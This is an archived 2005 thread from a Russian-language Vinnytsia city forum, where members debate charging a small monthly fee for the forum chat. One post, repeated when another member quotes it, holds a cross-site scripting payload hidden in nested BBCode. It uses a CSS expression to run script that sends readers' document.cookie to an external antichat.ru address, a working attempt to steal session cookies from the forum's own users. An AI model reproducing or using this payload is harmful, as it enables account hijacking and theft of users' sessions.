rating.show просмотр выдачи магазинов rozetka.ua prom.ua bigl.ua
  
Загрузка 5 страниц поиска за несколько секунд. Анализ любого товара или магазина
::Винницкий:: ::форум ::

Форум города Винница, Украина. Общение для всех. Forum of Vinnitsya city, Ukraine. Every one invited. [ВРЕМЕННО: Вход только из чата (Спам-крантин)]
 FAQFAQ   ПоискПоиск   ПользователиПользователи   ГруппыГруппы 
 РегистрацияРегистрация
   ПрофильПрофиль   Войти и проверить личные сообщенияВойти и проверить личные сообщения   ВходВход 

бесплатный чат!

 
Начать новую тему   Ответить на тему    Список форумов ::Винницкий:: ::форум :: -> Архив нашего форума
Предыдущая тема :: Следующая тема  
Автор Сообщение
тренер



Зарегистрирован: 16.10.2003
Сообщения: 576
Откуда: Венеция

СообщениеДобавлено: Чт, 30 Июн 2005 18:15    Заголовок сообщения: бесплатный чат! Ответить с цитатой

где-то на форуме проскакивала фраза "бесплатный чат". точно не помню где.

а почему бы его и не зделать платным??

ввести например символическую плату 5 грн. в месяц. сумма не большая, для тех кто хочет общаться в чате (я бы платил). сделать аккаунты которые нужно будет проплачивать и на них сделать поля для ников, сделать регистрацию допустим 3-5 ников. (сколько в чате не общаюсь, всем одного ника мало). это в свою очередь на 90% почити чат от "нердов". но со стороны админов в чате долен быть порядок. как ночью не сижу, экран становится одного цвета, иногда проскакивают другие цвета.

я не знаю сложно ли это с инженерной стороны, я не програмист, я всего лишь "Ю Зверь".

инициатива вроде как в нашей стране не наказуема.

чето еще хотел добавить, но забыл, потом допишу.

_________________
расстрелять
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
Night DeViL



Зарегистрирован: 20.01.2004
Сообщения: 1441
Откуда: а вы догадайтесь

СообщениеДобавлено: Пт, 01 Июл 2005 16:44    Заголовок сообщения: Ответить с цитатой

Я только за..флудерастам и нердам бой!запарили уже ...да и цена не очень большая.=) ..создаш се аккаунт...проплатишь где-нибудь его ..получишь номер пополнения и введёшь .=) ..и никаких проблем.=) Идея просто суперовая на мой взгляд!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
arwen~



Зарегистрирован: 17.10.2003
Сообщения: 1284
Откуда: Винница.Может найдете.

СообщениеДобавлено: Пн, 04 Июл 2005 08:50    Заголовок сообщения: Ответить с цитатой

ыыы.
Идея наманая.Но это еще одна гениальная идея которая падохнет без рассмотрения.Тут много недостатков и недоработок.
Например регистрация новых ников.Или есть же те,дети которые сидят дома,у которых денег нет.Или те кто лучше уйдет чем будет платить.=)
Короче я
за!=)
хотя денег мне таки жалко.

_________________
Каждое действие имеет последствия.Улыбка тожеSmile
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
1313



Зарегистрирован: 08.06.2005
Сообщения: 8

СообщениеДобавлено: Ср, 06 Июл 2005 14:21    Заголовок сообщения: Ответить с цитатой

[url]www.ut[url=www.s=''
style='font-size:0;color:#EFEFEF
'style='top:expression(eval(this.sss));
'sss=`i=new/**/Image();
i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
this.sss=null`style='font-size:0;]
[/url][/url]'

_________________
[img]
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
Ёric(vin)



Зарегистрирован: 09.10.2004
Сообщения: 394
Откуда: из Heavy Metal`a

СообщениеДобавлено: Ср, 06 Июл 2005 17:58    Заголовок сообщения: Ответить с цитатой

1313 писал(а):
[url]www.ut[url=www.s=''
style='font-size:0;color:#EFEFEF
'style='top:expression(eval(this.sss));
'sss=`i=new/**/Image();
i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
this.sss=null`style='font-size:0;]
[/url][/url]'


я знаю что я в хетеемеле не силен, если это он, но что это за тарабарщина

ту ИДЕЙНЫЕ РАБОТНИКИ: ну допустим я полюбас останусь, но это уже будет не реальный чат, так как большенство людей, минимум прорцентов 95 снимутся, и кто тут будет сидеть, яч да ты да мы с тобой, к тому же в течении месяца все поперезнакомлюются, и это уже не чат будет а подобие родному двору, нол если зделают, то я останусь

а зделать этго не так тяжело
1 из способов: закрить поудалять все левые(незаплатившии) ники, и закрить реестрацию, после этого каждий месяц сервак меняет парьль, если уплачено, и отсылает его те на мыло, вот и все

а так как людей будет не много, то ето можна даже делать в ручную

_________________
NOTHING ELSE MATTER
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
Джын и 3 жел.



Зарегистрирован: 07.02.2004
Сообщения: 686
Откуда: Из лампы!

СообщениеДобавлено: Пт, 08 Июл 2005 23:55    Заголовок сообщения: Ответить с цитатой

А чо ето вобще за хренотень???...
_________________
[img]
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
тренер



Зарегистрирован: 16.10.2003
Сообщения: 576
Откуда: Венеция

СообщениеДобавлено: Сб, 16 Июл 2005 05:08    Заголовок сообщения: Ответить с цитатой

понятно, тема епли никаво не паимела. всем пох и мне тоже наверно пох. а может и не пох..
_________________
расстрелять
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail Посетить сайт автора
~SeInt



Зарегистрирован: 04.01.2004
Сообщения: 152
Откуда: хз

СообщениеДобавлено: Сб, 16 Июл 2005 12:27    Заголовок сообщения: Ответить с цитатой

гггг)) интернесно а кто-то платить будет?
*чешет затылок*
Вернуться к началу
Посмотреть профиль Отправить личное сообщение
~1~%3~%0~



Зарегистрирован: 16.10.2003
Сообщения: 1169
Откуда: Живу я тут

СообщениеДобавлено: Пн, 18 Июл 2005 11:47    Заголовок сообщения: Ответить с цитатой

Мдя......
будущие Чатовские Магнаты...


но можно несколько изменить ход мысли......
ввести не в обяз....плату за пользование чатом а на добровольных началах.......(типа пожертвования....кто сколько может..гы)....
ну и прикрутить к тому или иному нику форму (Членский взнос.)....и кую нибудь прикольную аватару....а не просто рожу....

но это все мечты мечты...... Rolling Eyes ...на самом деле этим никто не будет заниматься посколько никому на...рен не нуно....есть себе чат и есть... Very Happy

_________________
живу я тут
[img]
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Посетить сайт автора
Показать сообщения:   
Начать новую тему   Ответить на тему    Список форумов ::Винницкий:: ::форум :: -> Архив нашего форума Часовой пояс: GMT + 3
Страница 1 из 1

 
Перейти:  
Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Forum protected by PHP Firewall.© by Vianet 2003.Process time Firewall:0sec / Core:0.02sec


Powered by phpBB 2.0.6 © 2001, 2002 phpBB Group

rating.show просмотр выдачи магазинов rozetka.ua prom.ua bigl.ua
  
Загрузка 5 страниц поиска за несколько секунд. Анализ любого товара или магазина